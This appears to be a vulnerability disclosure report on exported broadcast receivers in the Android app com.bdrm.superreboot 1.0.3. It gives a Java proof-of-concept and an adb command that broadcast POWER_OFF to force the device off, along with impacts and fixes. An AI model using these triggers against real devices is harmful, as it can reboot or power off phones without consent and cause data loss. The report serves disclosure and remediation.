Vulnerability Assessment Report
The Android application com.bdrm.superreboot, version 1.0.3, exposes several critical actions through its exported broadcast receivers. These exposed actions can potentially allow any app on the device to send unauthorized broadcasts, leading to unintended consequences. The vulnerability is particularly concerning because these actions include system reboot, entering recovery mode, power off, and more.
- Application:
com.bdrm.superreboot - Version:
1.0.3 - Vulnerable Component: Exposed broadcast receivers, particularly
PowerOffWidgetReceiver - Nature of Vulnerability: Unauthorized broadcast to exported receivers
- CWE: CWE-927: Use of Implicit Intent for Sensitive Communication; CWE-925: Improper Verification of Intent by Broadcast Receiver
Android Java PoC:
import android.content.Intent;
import android.content.Context;
public class MaliciousBroadcastSender {
public static void main(String[] args) {
triggerExposedAction("POWER_OFF");
}
private static void triggerExposedAction(String action) {
Context context = getApplicationContext();
Intent intent = new Intent();
intent.setAction(action);
context.sendBroadcast(intent);
}
}ADB Usage PoC:
adb shell am broadcast -a POWER_OFF -n com.bdrm.superreboot/.PowerOffWidgetReceiverGiven the exposed actions, a malicious app can:
- Reboot the device without user consent
- Force the device into recovery, bootloader, or download mode
- Power off the device
- Restart essential system processes
- Boot the device into safe mode
These actions can have significant consequences including unexpected behaviors, data loss, or rendering the device temporarily unusable.
- Set
android:exported="false"if there's no need for other apps to send broadcasts to the receivers. - Implement permissions using
android:permissionattribute to protect the broadcast receivers. - Always verify the sender of the broadcast within the
onReceive()method. - Avoid exposing critical system-level functionalities that can be triggered externally without adequate authorization checks.
- CWE-927: Use of Implicit Intent for Sensitive Communication
- CWE-925: Improper Verification of Intent by Broadcast Receiver